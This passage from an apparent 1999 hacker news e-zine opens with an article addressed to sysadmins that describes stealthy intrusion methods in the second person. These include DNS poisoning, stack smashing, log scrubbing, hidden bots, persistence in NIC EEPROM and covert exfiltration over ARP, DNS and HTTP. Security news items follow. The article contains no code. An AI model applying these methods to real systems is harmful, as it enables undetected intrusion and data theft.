packets between the two. Once the host with network interfaces on both segments is penetrated, packet hijack software can grab the packet and relay it to the other interface before the firewall software even sees it, essentially providing you with an invisible back-door into the target. Some forms of firewall penetration do not even involve bypassing the firewall. One interesting attack technique it to identify frequently visited sites by the target, taint the DNS database with a forged update to their DNS server or cache so that the next time the target client contacts the frequently visited site, the traffic is pointed to one of your attack systems instead. This attack relay system can conveniently embed your attack exploit in relayed copies of the original web site. With modern Java enabled browsers, the client naively executes any code the supposedly well known site, which is in reality your attack relay, sends. The data is sent in response to a client's request through the firewall and walks right past the intrusion detectors, virtually indistinguishable from ordinary data. This attack mode is also available by taking over the target ISP's router or DNS server. Other forms of stealth involve penetrating SNMP traffic statistics or nearby systems at their ISP or other peer clients to identify traffic activity. The design flaw of the Internet that makes identifying forged source addresses a difficult problem can also let you hide the origin of the attacks (so called "spoofing"). If attack traffic is sent from (or spoofed to look like) a source that is currently sending a lot of data to the target, it makes it that much more difficult to spot the attacks. This buries the attack packet amongst reams of other voluminous data. It quickly scrolls the attack packets off the screen of sniffers and makes network security staff at the other end go through the tedious "find the needle in the haystack" procedure of sorting and filtering megabytes and megabytes of capture data if they suspect the attack. Most of the time they will not have the patience to exhaustively search for attacks by scrolling though the captures and logs, again rendering you invisible. After penetration, further attack software can be embedded in ordinary traffic to transfer it into the target's systems. Patience is the key here. The lower the data rate that can be used to get the information in and out, the lower your chances of being detected are. Spreading out your packets, so only a few per hour are transmitted, makes your hack very difficult to detect with today's tools. (However, we have developed some special tools to counter this kind of attack.) One of the more devious penetration methods we observed was a system that trickled data in and out in the normally unused padding at the end of user data packets. On normal sniffers and detectors, the packets looked completely innocent, as even those tools did not display the padding "garbage" used for the hack. This padding was used to install malicious software by trickling the attack executable into the target a little bit at a time, a few bytes with every packet. Another interesting stealthy attack system that will negate most firewalls is to embed your hacking control channel for your attack bot software and results and information back from the bot in addressing translation requests, that by definition need to be passed on by firewalls. One such clever system we experienced was an attacker who penetrated another nearby client node on an ADSL system. They then penetrated one of our systems (a sniffer of all things) and installed a key-stroke logger that encoded the keystrokes typed at the console into the address field of Address Resolution Protocol (ARP) lookup messages, which were happily passed through the firewall and relayed to the attacker at the nearby system outside the firewall on the same subnet that received the ARP encoded keystrokes. This key logger even delayed, encrypted and grouped keystroke transmissions to make detection more difficult. We have also seen keyboard loggers that were clever enough to store your keystrokes on disk, in case the system was disconnected from the network (like a laptop) for a while and then trickled them out later when the net connection was re-established. Key loggers provide easy access to most authentication tokens, scrambling keys and passwords. The basic form of penetration is to use stack smashes which take advantage of basic low level coding bugs in a piece of applications software or an operating system component. The form of a stack smash exploit is to utilize a data coding that allows variable length data that you send to be erroneously copied into fixed length buffers or variables, and writing into data past the end of the buffer. Since this data can overrun the stack, you can overwrite a return address for the currently executing function and make the processors CPU jump to and execute arbitrary code of your choosing. If the bug exists in a privileged piece of software, these instructions that you jump to are virtually unlimited, allowing you to do literally anything with the penetrated computer. The problem with this form of attack is that it often requires detailed knowledge of the operating system and memory map of the target. Often this form of attack will have to be coded in multiple ways to account even for the version of OS and software package being penetrated. The drawback for the attacker and the advantage for the defender is that usually stack smashes involves "groping" around blindly, sending multiple variants with different offsets and values until the appropriate magic version number that works correctly and responds back is found. In some cases an incorrect variant can crash software and systems, necessitating lots of patience and long time delays between variants tried. A common target for stack smashes are recent and older variants of the "bind" name daemon that is in almost universal use to translate from symbolic DNS names and URLs into numeric IP addresses. The code and traffic structure of this program is very complicated, difficult to debug and ripe with vulnerabilities and bugs. One 17 year-old hacker managed to take over more than 12,000 systems over two years - before he was caught with an automated "bind" takeover worm. Another common form of attack is to exploit the increasingly complex and powerful native data types of applications software (especially Microsoft products that often contain several complete programming languages in things like word processors and mail readers). Web server script exploits also fall into this category. The basic technique here is to either hijack an existing connection and inject malicious data or to send unsolicited attack traffic that will take over the application and eventually the system. D) Control Once you are into the system and have compromised a piece of software, the next bit of work is to get control of the host. This is usually a bootstrap process, where a piece of small code, "the exploit", is first gotten into the target and the vulnerability is used to execute the code. This code needs to contact one of your attack relay systems and download further code and instructions. The simplest form of bootstrap is to allow remote access to a command shell that can execute arbitrary operating system commands. There are many forms of bootstraps, as they are often linked to the exploit itself, and some, like BackOrifice, include a whole command interpreter. But those more advanced download a minimum of code and use existing portions of the operating system code to build a remote control system attack bot. These advanced exploits can, in object oriented fashion, build whole parallel network stacks and control systems that run invisibly in the background on the machines using software already installed on the machine. A portion of the bootstrap process during attack is to restart or patch the application that was crashed so that the intrusion is not noticeable. Other important parts of this process include cleaning up the log files to remove intrusion messages and hiding the attack bot so that it isn't listed in the task viewer or process list. "Scrubbing" the log files can be easily accomplished by recording the file pointers to important log files at exploit time, installing and bootstrapping your attack bot and then "rewinding" the log files to their pre-attack positions to erase any evidence of the installation by overwriting the operating system file pointers in memory with your pre-attack copies. Subsequent log entries will overwrite the evidence of the attack. Log files to be cleaned up include sniffer capture files, system event logs, DNS and other daemon diagnostic files, IDS systems files and file integrity checkers like Tripwire. The good attack bots make log-files almost useless for intrusion detection. Your attack bot can control the machine up to the privilege level of the software that has been penetrated. It can access any resource that the original software could. In many cases, this will not include super-user "root" or "administrator" privileges and you will need to use another local exploit to break in further. One alternative approach is to download a password cracker and dictionary to be stored in invisible files or unused portions of the disk and let this cracker run in the background on the machine (invisibly off any task list of course), using a brute force search for the password on the same machine. This generates little traffic, and is very difficult to detect by the target, as the machine will work silently to crack the password for you when idle. One such attack system that was used against us used a remarkably compact word-list and a very patient brute force cracker - to good success. Super-user privileges are not needed all the time. Even in cases where the cracked software has been limited to accessing only a few resources, it is often enough to use the system as an attack relay base. One of our attackers used a "bind" exploit once on a firewall system where we had purposefully confined the non-privileged version of "bind" program to a "chroot" jail that limited filesystem access to a very small subset of files. This didn't stop the sophisticated attacker much, as even the ordinary user privilege "bind" already had permission to access both internal and external Ethernet interfaces and bridge packets between the two to bypass the firewall software. With careful design, your attack bot can allow you to encrypt, hide, download, remotely install and run arbitrary software packages, and send traffic so that even sniffers installed on the target do not see the packets. It is relatively straightforward to insert and remove packets from the network card, transmit and receive queues, so that normal OS security and logging measures on the penetrated host never even detect the traffic (including bypassing low-level transmit and receive counters). Similarly, it isn't a major technical feat to hide the bot tasks so that they don't show up on system diagnostics. You can completely remotely control a machine and run programs on it, upload and download data, without any indication to the user other than occasional sporadic slowness - which on Windows is almost indistinguishable from normal performance, and Linux and NT aren't much better. E) Embedding After you have gotten in and have control of the target, the next step is ensuring that you can retain control even if your actions are discovered. You need to quickly map the local net and penetrate any other system suspected of being a sniffer or key communications links, such as mail servers, to observe any suspicion of intrusion on the part of the target's IT staff. The next portion of clean up is to trickle in any additional attack code into the target and whatever is needed to make your controlling attack bot install and hide itself on disk. The point here is to allow your bot to survive a system re-boot and retain control so that you do not have to go through the dangerous - and detectable - attack and clean-up sequence again. Several techniques have been observed for doing this. One is to overwrite existing and little used OS files that exist in nice, known predictable places/paths, but are seldom used (the more marginal games that come with OS distributions, and terminal definitions for obscure terminals quickly come to mind for this purpose). A sophisticated variation on this is to encrypt and spread your binary over many files (sometimes called steganography). Another alternative that requires more low level programming is to use unused, empty portions of local disks. The system then has to be modified to re-enable your bot after rebooting. A variation on this hidden attack bot is to install a back-door that will lie dormant on the disk and install a small, difficult to detect bot that waits until receipt of a special traffic trigger which will then set off re-assembly from code pieces spread out on disk files and activation of the more powerful attack relay bot. This kind of traffic trigger system could also be used to render the traffic invisible. One attack system installed itself across multiple systems and suspended normal OS operations and triggered execution of the loaded command in the attack bot upon receipt of a multicast trigger. The OS remained suspended until a time out or reset trigger was received, allowing the exploit to run without any normal security and logging active. By using a multicast trigger, multiple systems can be triggered and momentarily suspended simultaneously, and if the control bot is installed on any sniffer systems, data recording was suspended while the attack bots execute their commands in this suspended state and send their traffic, again rendering the whole attack invisible. Multicast traffic also has the added advantage of being not reported in the default configuration of most sniffers, so unless the IT staff explicitly enables reporting, they will not usually be aware of it. This kind of attack is very difficult to detect unless an operator is paying very close attention to traffic LEDs. One condition for the attacker to plan for is what happens to your bot if it is discovered. One attacker once used a system that erased itself if it lost contact with the attack relay base for more than a certain period of time, or if the system was re-booted (as would happen when a system gets off-lined because breaches are suspected). In this way any evidence was erased whenever a penetration was suspected. The Perl language, if installed on the target, provides a nice compact way to download very powerful programs with a minimum of data transferred, and the standard Perl kit includes routines for embedding (hiding) your Perl script into other binaries. Another clever exploit is to store a piece of your attack bot bootstrap sequence on the network card itself. Most modern network cards have 64 bytes (or more) of EEPROM that are used to store the 6 byte hardware MAC address, leaving the majority of the space unused. More sophisticated server network cards even have more space for downloadable firmware. The mostly unused network card EEPROM is typically loaded by OS drivers in its entirety - usually to a fixed address static buffer. A small segment of code could be programmed into the card and executed from this buffer by an exploit. The advantages to storing a portion of the attack code in the NIC is that it makes tracing the activity of the exploit difficult for someone trying to reverse engineer the code, and more importantly, a short program installed here will survive a disk formatting and OS re-install. This kind of exploit will lead to a lot of head scratching and questions about "How the hell do they keep getting back in after a disk wipe?" at the target. F) Data extraction/modification After you have established control, then you can get on with your nefarious purposes. Typically this will be data extraction and modification on the target system. On Microsoft systems, the registry and Microsoft's own system information utility, enable rapid gathering and dense transmission of key system configuration back to your attack relay. Under Linux, the /proc filesystem provides the most rapid clues as to system configuration, allowing your attack bot to build a summary of what it found on the newly penetrated server and transmit it to the relay. Important attributes of data extraction and control of modifications for attack bots are to hide and encrypt this data stream. It will be beneficial to spread these transmissions out over several relay destinations and have them happen at low rates. One of the safer, stealthier data extraction systems is to embed the data in HTTP web transfers that make up a large percentage of most site traffic these days. Putting your encrypted data deep into packets and disguising it as JPEG or GIF binary data will help hide it. Most traffic loggers and sniffers usually capture only the beginning of most packets, so embedding your data deep into the packet will make it all that much more difficult to see, depending on what security tools your target is equipped with. As was mentioned above ARP and DNS also provide methods of hiding your data transmissions. A key piece of information on the path to hiding your attack bot data traffic amongst the target's traffic is understanding your target's traffic patterns. You need to know when, how (what protocol) and who the target is talking to. Both Linux/Unix and Windows come with some pre-made system tools that you can use to record these traffic patterns, without downloading much additional software. The more sophisticated network cards under Windows come with RMON and other MIBs that can be used to gather traffic pattern information, so that your traffic can be spoofed and modified to look like client traffic requested by users at the target site. RedHat Linux contains many pre-installed mapping tools including arpwatch and SNMP that can be used to monitor local traffic to see what kinds of traffic will likely escape detection Penetrations of the target's ISP to get traffic stats can be a boon here too. Another important kind of data hiding is to send your data in little bursts, and follow that data with a burst of legitimate addressing or ARP traffic to scroll your attack data off the display screen of any sniffers in case you encounter a fairly quiet traffic level at the target's system. Doing this kind of data transmission in the wee hours of the morning will also lower the chances that there are any humans looking at status screens at the network control center and noticing anomalies. G) Attack Relay The final step in attacking is to successfully use your new system as a relay base for other attacks. Building up a large "fleet" of attack bases is its own reward - with more systems to attack from your subsequent conquests will be more stealthy and difficult to track. But now your target relay site will likely notice if you start port-scanning "trantor.army.mil" or other such contentious targets, so be careful (this is another real-life example scenario used on us here). Most sysadmins will not take kindly to the possibility of getting phone calls from the U.S. military asking why their servers are attacking them. But then again, most won't notice. Attack-Tool: One clever exploit a hacker used on one of the "honey-pot" decoy systems we use as hacker-bait for analysis was an SNMP triggered attack reflector. This system used two SNMP triggers to effectively hide the out-bound attacks. The first trigger put the system into listen mode. After sending the trigger, the attacker quickly sends a spoofed attack packet containing the attack to the relay system. The spoofed attack packet is coded to look like a packet from the attack destination to the relay. Upon receipt of the second SNMP trigger and after a delay, the recorded attack packet is sent back to the actual attack target with the original source and destination reversed. In this way the sequence of the attack is seemingly reversed, with the local relay system responding with a single packet after receipt of the single packet from the target. Unless you look carefully on most sniffers and IDS systems, it looks like the target is attacking the relay system instead of the other way around. A good ploy to avoid detection is to use many different attack relay or mapping systems and to avoid using the same attack relay system twice in the same day or week with a particular target. An isolated packet here and there destined for a strange system will not arouse many suspicions, but repeated transmissions to the same target could possibly trigger off alarms at the relay or target - however unlikely that may be with most sysadmins asleep at the security wheel. Conclusion I hope the above attack techniques scare any sysadmins reading this. As they should. Too many people these days feel that security is keeping out the script-kiddies or installing a firewall. There are a lot of nastier things out there on the net than the mindless script-hordes, so beware. I hope you can use this article to justify better security measures to your boss. This stuff is out there - it's been used on us. Odds are these kinds of exploits have been used on you and you have no knowledge of it. There are malicious minds developing new attack bots, and communities of people dedicated to the breaching of security measures. I would even surmise that there are now organized and funded efforts on the part of military and intelligence agencies to further develop such offensive software. One of these days, organized crime may even wake up to this. As we are discovering, it's the law of the jungle out there on the Net, and there are few places to turn to for assistance in case you get some malicious bozo attacking you. Often you are left to your own devices, and with little support from your own organization, that may be technically illiterate when it comes to network security. The only defense seems to be to stay technologically ahead of the attackers - a constant and resource intensive process. The good news is that it's easier to play defense than offence. Good luck. P.S. You do have good backups, don't you? @HWA 43.0 TAIWAN CIRCLES WAGONS IN CYBER-WARFARE ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Thursday 26th August 1999 on 11:40 pm CET A senior Ministry of National Defense official wednesday said that Taiwan is capable of defending itself from an information technology attack by China, but will not itself provoke a cyber war. The ministry has also set up a special task force to oversee the island's information warfare strategy, said the director of the ministry's Electronic Communications and Information Bureau. "China has put a lot of effort into building up its information capabilities in the past decade," Lin said. He added that Beijing has conducted a few military exercises to test its information warfare development. "But Taiwan is also working on it. We are not as fragile as many people think," he said. Read more below From Infowar.com http://www.infowar.com/mil_c4i/99/mil_c4i_082599c_j.shtml China: Taiwan Circles Wagons In Cyber-warfare. A senior Ministry of National Defense official said yesterday that Taiwan is capable of defending itself from an information technology attack by China, but will not itself provoke a cyber war. The ministry has also set up a special task force to oversee the island's information warfare strategy, said Lin Ching-ching, the director of the ministry's Electronic Communications and Information Bureau. "China has put a lot of effort into building up its information capabilities in the past decade," Lin said. He added that Beijing has conducted a few military exercises to test its information warfare development. "But Taiwan is also working on it. We are not as fragile as many people think," he said. A power outage that plunged four-fifths of the island into darkness on July 29 intensified Taiwanese people's fear of a Chinese military attack. But while those fears have gone unrealized, cross-strait tensions continued to rise in early August as hackers from both sides of the strait broke into each other's government websites to post provocative slogans and national flags. The Internet battle also raised public questions as to whether Taiwan has the capability to handle what will be a future trend - information warfare which is widely viewed as a major challenge to the island's information technology. Lin allayed such concerns, saying that Taiwan has the ability to counter China's information attack and has set up a military information warfare strategic policy committee as the highest decision-making body on the issue. Lin said that none of the island's computer systems broke down during the blackout. Generally, man-made mistakes cause 70 percent of computer breakdowns on the island, he said. "We have realized that killing viruses is not our top priority and a crisis-solving center should be established," he said. But because Taiwan has a limited national defense budget, everything must be cost-effective, said Lin. According to Webster Chiang, the vice chairman of the Cabinet's Research, Development and Evaluation Commission, the maintenance and development of information protection systems accounts for only one percent of the national budget. Chang Kwang-yuan, director of the information division at the National Security Bureau, said the bureau had tracked down 165 websites as the sources of hacking by mainland Chinese on August 7. He said the some of the websites were found to be government-operated but declined to identify whether the intrusions were orchestrated by the Chinese government or individual hackers. Tang Yao-chung, an information science professor at National Taiwan University, suggested that the government devote more effort to the development of Taiwan's offensive computer warfare capabilities. "Developing coding abilities is a profitable business and should be done by private companies," said Tang. "But decoding and building offensive strategies are the government's responsibilities." Lin said he does not encourage provoking China by Internet hacking, but said Taiwan is capable of standing firmly. "On a legal basis, we don't encourage taking the offensive, although we do have the ability to handle any offensive aggression by China," said Lin. The cross-strait cyber war is likely to continue as more websites from both sides are hacked. While Taiwan is focusing on more military purchases, the incident provided a chance for Taiwan to re-examine its information security. ASIA INTELLIGENCE WIRE CHINA NEWS 17/08/1999 @HWA 44.0 UK WEBHOSTING COMPANY HIT BY VIRUS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Thursday 26th August 1999 on 11:15 pm CET UK-based Web hosting and development company Fortune Cookie Digital Media was subject to an attack by the Backdoor-G trojan yesterday, affecting approximately 10 percent of the sites hosted according to the company. Full story http://www.idg.net/idgns/1999/08/26/UKWebHostingCompanyHitBy.shtml U.K. Web hosting company hit by virus by Douglas F. Gray, IDG News Service\London Bureau August 26, 1999 U.K.-based Web hosting and development company Fortune Cookie Digital Media was subject to an attack by a "Trojan horse" virus yesterday, affecting a number of Web sites hosted by the company. Approximately 10 percent of the sites hosted by the company were infected with the virus, according to Justin Cooke, founder and managing director of Fortune Cookie. Earlier media reports quoted Cooke as stating the number as 30 percent, a figure which he now states was "probably an overestimation because [the situation] was still going on." The Trojan horse virus, called BackDoor-G, provided access to passwords that uploaded a second virus to the Web server, which then infected certain default documents, including default.htm and index.html, according to a press release issued by the U.K. company. Cooke admitted that some of the Web sites affected by the virus belonged to "small-to-medium companies," but he refused to name them. The company release claimed that "all affected Web sites were returned to normal operation" within 20 minutes. Fortune Cookie, in London, can be reached at http://www.fortune-cookie.com/. @HWA 45.0 NETSCAPE ISSUES WEB-SERVER FIX ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Thursday 26th August 1999 on 10:50 pm CET Netscape and ISS X-Force have issued a patch for the buffer overflow problem in the Netscape Enterprise and FastTrack servers. ".. an attacker can exploit the vulnerability and remotely upload and execute arbitrary assembly language. An attacker can write an exploit to get the computer to do what ever they want.." according to X-Force director Chris Rouland. Infoworld has a story, Iplanet has a patch. http://www.iplanet.com/downloads/patches/detail_12_86.html @HWA 46.0 CWI CRACKS 512 BIT KEY ~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Thursday 26th August 1999 on 10:20 pm CET Researchers of the CWI in Amsterdam, Holland, today announced that they have been able to crack a 512 bit code. This ones more proves that this standard, which is still used on the Internet for e-commerce transactions a lot, just doesn't cut it. The technology they used (besides 300 workstations and Pentium II's :) will enable them to crack any 512 bit code in the future according to CWI. @HWA 47.0 MOUNTING AN ANTI-VIRUS DEFENSE ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Thursday 26th August 1999 on 10:00 pm CET With computer viruses on the rise, and in the wake of the 'Melissa' incident, anti-virus software becomes a part of the security arsenal. What's needed to keep the viruses out? Some firms present their ideas and solutions in this article. Mounting an anti-virus defense With computer viruses on the rise, and in the wake of the 'Melissa' incident, anti-virus software becomes a part of the security arsenal By Heather Harreld Anti-virus software, which often was viewed as the security stepchild to sibling powerhouse technologies such as intrusion detection and firewalls, has been elevated to a new market status following the "Melissa" virus, which in March infected machines worldwide via e-mail. Once sold mainly as a single desktop solution - which users often labored to disable or bypass - anti-virus software is being bundled with other security solutions designed to secure entire enterprises from security threats. Anti-virus software has emerged as an integral component of agency security efforts because viruses are more easily transmitted in today's networked world, and the viral breeding ground of the Internet has spurred phenomenal virus growth. Although the majority of viruses in 1997 were transmitted by floppy disks, the major source of virus infections today are from e-mail attachments, which can be used to spread a virus at alarming speed. The Melissa virus affected more than 100,000 machines worldwide in just days by seizing users' computers and e-mailing copies of itself to the first 50 names in the e-mail address book. In 1986, there was one known computer virus; in 1990 that number had jumped to 80. From December 1998 to January 1999, the total virus count jumped from 20,500 to 36,500. Today, there are about 45,000 computer viruses in existence, with new ones appearing every day. "A lot of the virus attacks...are starting to blur the lines between [a virus or a vulnerability?]" said Sal Viveros, group product manager for Network Associates Inc.'s Total Virus Defense Division. "It is much easier for a hacker to send an e-mail attachment than it is to penetrate a firewall. We're seeing more destructive viruses that are hitting more people." Network Associates offers an anti-virus package that provides virus protection spanning the desktop, groupware and gateways, and it also has a security suite offering anti-virus software coupled with firewalls, intrusion detection and encryption. Viveros said the common alerting and reporting mechanisms from the security suite enable a network administrator to react more quickly to problems. For example, if a hacker finds an open port and uses it to insert a virus, intrusion-detection and anti-virus software can work in tandem to provide an accurate picture of what is happening on a network. "You're starting to have rules-based reactions," Viveros said. "You're taking away the need for the network administrator to be sitting there monitoring those different things when they happen. By setting rules, the different components are talking to each other." Symantec Corp. in May announced its Digital Immune System, a strategy to capitalize on its anti-virus technology, while coupling it with intelligent tools designed to keep systems running at peak performance. With its anti-virus software, the company will offer tools for server management, desktop configuration, remote system operation and disaster recovery - all from a single console. Chris Mills, Symantec's product manager for Digital Immune System, noted that the strategy will include advanced anti-virus management tools that enable a network administrator to lock down policy requirements on the desktop and configure virus responses that automatically go into effect upon detection. In addition, the company plans to add security mechanisms such as e-mail scanning, Uniform Resource Locator filtering and protection from malicious Java applets, he added. "What [customers are] worried about are threats to their enterprise," Mills said. "It's not strictly an anti-virus concept. We're talking about protecting your enterprise from unknown threats that will negatively affect your credibility, your cost and your uptime." Worldtalk Corp. has bundled multiple security mechanisms into its secure server product, which is being used by the Energy Department and the Food and Drug Administration. In addition to a server-based virus detection solution, the company also offers access control,which regulates who a user can send e-mail to and receive e-mail from, and encryption controls. DOE's headquarters used Worldtalk's secure server to begin containing the potentially devastating Melissa virus before a fix was even discovered for it, said Charlie Smith, information management consultant at DOE. Smith said that although many other anti-virus products provide the ability to disinfect incoming viruses before they are passed on to users, Worldtalk's server enabled him to program a policy that would target and quarantine any incoming e-mail with a specific message in its header. "The quarantine allowed us to really track Melissa," Smith said. "It gave us a history to trace back to the originator." Bill Mann, director of product management at Worldtalk, noted that the ability to program policies into the server also could be used to fend off potentially damaging mobile code, such as hostile Java applets, that users unknowingly can download from World Wide Web sites. "Literally anything that can be done by a program can be done by mobile code," Mann said. "It can open database connections. It can install viruses on your PC. Mobile code gives the hackers so much more flexibility than virus writing." It is not only traditional anti-virus and computer security companies that are homing in on technology to combat viruses. Companies targeting the electronic-commerce market are bundling anti-virus software with other computer security solutions. In July, Computer Associates International Inc. introduced its eTrust security solution, which bundles anti-virus technology with public-key infrastructure technology, encryption controls, intrusion-detection scanners, firewall components, network surveillance and authentication tools. Kurt Ziegler, senior vice president for CA's security business, said the eTrust network surveillance component is crucial to containing viruses because users have not always updated their software to detect the latest viruses. Because these identification delays can de devastating, a containment strategy is crucial, he said. "We include some technology that lets you identify movement, to get a pattern," Ziegler said. "It scans the network on the inside...so you can see a neighbor sending it to a neighbor inadvertently. Should you get an identification...you can quickly go back over the that traffic and say who's carrying what where." Judith Spencer, director of the Center for Governmentwide Security at the General Services Administration, said the Melissa virus - combined with other incidents, such as a hacker group threat to target the federal government - has helped increase government security awareness. She noted that though anti-virus software is "indispensable" on systems today, it should be viewed as only part of an agency's security arsenal. "Integrated security solutions are a good idea," Spencer said. "[But] the way that you implement security solutions as opposed to whether or not the product comes bundled is more important." Bundling anti-virus software with security mechanisms located at the perimeter of a network is advantageous because everything coming in to the environment is checked, and network administrators do not have to worry if end users have updated their software, said Lance Travis, service director at Boston-based AMR Research Inc. However, that method also has its drawbacks, he noted. "You're now scanning every e-mail message [and] every Web page that comes through your firewall," Travis said. "There's a huge performance penalty you could potentially pay." Trend Micro Inc. is an anti-virus firm that has chosen not to bundle its anti-virus software with other security products. Instead, the company is designing its products so that they will interoperate with other key products needed for security, said Dan Schrader, Trend Micro's vice president of new technology. Trend Micro offers an integrated border security approach, scanning for viruses at perimeter points such as e-mail servers and Internet gateways. That approach was designed to stop viruses and malicious code before they enter the network. Trend Micro's anti-virus software is being used by the Department of Housing and Urban Development on 75 servers to support about 11,000 users. The product was designed to eliminate the expensive and disruptive "pre- emptive e-mail shutdown" strategy that many government agencies are forced to deploy when threatened with viral infection, Schrader said. "You want to identify where key Internet traffic enters your organization and have the code scanner at those entry points," Schrader said. "Anything that relies on the end users for best practices is doomed to fail." Many anti-virus vendors are moving to take control of the software away from end users, who notoriously try to bypass the software safeguard or forget to update it to protect from new viruses. But Roger Thompson, technical director of malicious code research at the International Computer Security Association, noted that anti-virus software still must be multilayered. "If an infected document is attached to an e-mail, then something at the mail server or firewall wouldn't pick it up if the document was encrypted," Thompson said. "You still have to have detection on the desktops." Anti-virus software vendors may see the demand for their products increase even more in the future as virus-like threats to networks continue to grow. William Orvis, security specialist at the Computer Incident Advisory Capability at Lawrence Livermore National Laboratory, noted that he is seeing an increasing incidence of worms - programs that crawl through networks, automatically making and distributing copies of themselves while installing dangerous back doors in systems as they move. As a result, unauthorized users can remotely control a system with a back door installed. Anti-virus software can be designed to watch networks for worms. However, Orvis said products of the future will have to "intelligently" detect viruses that have never been seen before, instead of relying on tracking viruses by their "signatures," which is the most common viral-detection method today. "We need a way that we can have smart computer code...and say, 'That is probably a virus,' " Orvis said. "We need to learn to teach a machine to recognize a virus." Harreld is a free-lance writer based in Cary, N.C. @HWA 48.0 RETROSPECTIVE ON CRACKING CONTESTS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by BHZ, Thursday 26th August 1999 on 3:25 am CET We covered both Windows2000 and LinuxPPC cracking contests on HNS. Linux machine got one-tenth the number of attacks that the Microsoft server has endured. Neither of servers was compromised, and the companies said data stored within those servers has remained secure. ABC has an article on it. Read it here. Microsoft and Linux PPC Engage in Testing One-Upsmanship Microsoft put a bullseye on its Windows 2000 operating system by inviting hackers to have a go at it. So far the system has crashed, but hackers haven't gained access. (A.Shepherd/ABCNEWS.com) By Michael J. Martinez ABCNEWS.com Aug. 24 — Three weeks ago, Microsoft engineers loaded up a server with Windows 2000 beta, connected it to the Internet and invited anyone who wanted to test its security by trying to break into it. The next day two things happened: the Windows 2000 operating system crashed because of a bug, and Linux PPC, a small company in Hales Corners, Wis., put up a server running a Linux-based operating system and issued the same invitation. Since then, both servers have gone down due to various technical problems, though neither has been “cracked;” no one has been able to access the information stored on those servers. Both Microsoft and Linux PPC have claimed the tests demonstrate the security of their respective operating systems, though the frequency of problems on the Microsoft server has been a source of jokes among Linux enthusiasts. Microsoft Puts On a Bullseye The new Windows 2000 operating system, due to be released in October, will replace Windows NT as Microsoft’s workstation and server operating systems for businesses. Despite a release schedule marred by numerous delays and in spite of the growth of popularity of competing systems — particularly those of Linux — Microsoft hopes the new operating system will be as broadly accepted as its predecessors. So, on Aug. 2, Microsoft loaded a 500 MHz Pentium III server with Windows 2000 and the IIS Web server program, and linked it to the Internet. The system lacked a firewall — impermeable software designed to protect a system’s entry points — and was protected only by the security inherent to the Windows 2000 operating system. The next day, router failures (not hackers) caused intermittent downtimes. The problems continued until Aug. 14, the first day without downtime on the server. Since then, there have been three other disruptions. On the test Web site, Microsoft managers note that no data has been taken from the machine — it still remains secure. In addition, a number of software bugs in the Windows 2000 software have been discovered and fixed. Linux Chimes In The day Microsoft announced its tests, the engineers at Linux PPC began receiving user e-mails wondering if the company would respond in kind. Linux PPC is different from other Linux distributors; its OS is made for Macintoshes instead of the usual IBM clones. “The response from our users was enormous,” says Marcia Knapp, business manager for the company. “They were confident that our software could withstand much more than Microsoft’s, so we decided to put a box up.” The Linux PPC machine is a far cry from the high-end server Microsoft is using. The company is using a 132 MHz Power Macintosh with just 160 MB of RAM, and the machine is running an open-source Apache Web server. Yet the Linux machine has only gone down twice — and one of those times was because someone tripped on a cord. The other time was because of a successful denial of service attack — the server was crashed not because of a security breach, but because someone attempted to overload it with meaningless data. Under Attack It should be noted that the Linux machine is getting one-tenth the number of attacks that the Microsoft server has endured — and that the Windows 2000 operating system is still in beta, and is due for more debugging once it has been released. Still, both sides claim the data stored within those servers has remained secure. It may have been just another PR stunt. But once again Microsoft comes out looking like a giant with egg on his face — egg tossed by a tiny rival in Wisconsin. @HWA 49.0 SHOUTCAST COMPROMISED ~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by BHZ, Wednesday 25th August 1999 on 10:39 pm CET ShoutCAST (yp.shoutcast.com) - online directory of sites that offer you listening MP3 music on-line, has been compromised earlier today. Attacker just changed info for the best ranked sites to: " [skillz] MadCamel 0wns Nullsoft Now Playing: Greetz arr0w listeners -31337/31337 Bitrate - 666 and added an additional link to www.rootshell.com. @HWA 50.0 AUDIT OFFICE BLASTS AGENCIES' SERIOUS SECURITY FLAWS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Wednesday 25th August 1999 on 11:05 am CET A damning report from the Australian National Audit Office (ANAO), entitled "Operation of the Classification System for Protecting Sensitive Information", has reveiled serious flaws in the IT security arrangements of six unnamed Australian commonwealth government agencies. The audited agencies all had sensitive information to protect, with three of the six responsible for protecting national security information. Read more. http://www2.idg.com.au/CWT1997.nsf/Home+page/4C49A498F5EBCD6F4A2567D70021F2FE?OpenDocument Audit Office blasts agencies' serious IT security flaws By Laura Mason 25 August, 1999 SYDNEY - A damning report from Australian National Audit Office (ANAO) has revealed serious flaws in the IT security arrangements of six commonwealth government agencies. Entitled 'Operation of The Classification System for Protecting Sensitive Information' the report reveals that the IT&T environments of the six unnamed agencies the ANAO audited have inadequate security protection levels. The audited agencies all had sensitive information to protect, with three of the six respon-sible for protecting national security information. "Paper and electronic files were often exposed to unauthorised access because of various breakdowns in the protection of information in use or in transmission," states the report, which was tabled this month. Common breakdowns included "sensitive information stored on insecure electronic networks, and computers left on without the protection of screen saver passwords." All six of the agencies hold sensitive information in both electronic and paper-based form, with two of the six agencies operating secure networks, and two running mainframes with large databases. The audit found that agencies operating mainframes, with high-volume transaction processing, had better IT security than organisations with a LAN based environment, however those with mainframes were found to have weaknesses in their LAN environment. According to the report, "The access management controls on local area networks (LANs) were often not configured or implemented in accordance with ACSI 33 (the Australian Communications Electronic Security Instrucions 33 -- a Defence Signal Directorate's publication). Areas requiring attention include passwords, the number of log-on attempts and inactive user accounts. These weaknesses are of concern as all the networks carried sensitive information. "The audit found that more attention needs to be given to establishing effective monitoring and review processes, particularly in relation to IT&T audit trails to ensure security policies and procedures are operating as management intended," said the report. According to ANAO, all six agencies audited are failing to give sensitive information adequate protection. Dean Kingsley, Partner, Secure e-business at Deloitte Touche Tohmatsu, commented that for many organisations IT security, outside the context of e commmerce, was "way down the priority list" since it was viewed as an overhead rather than an enabler. @HWA 51.0 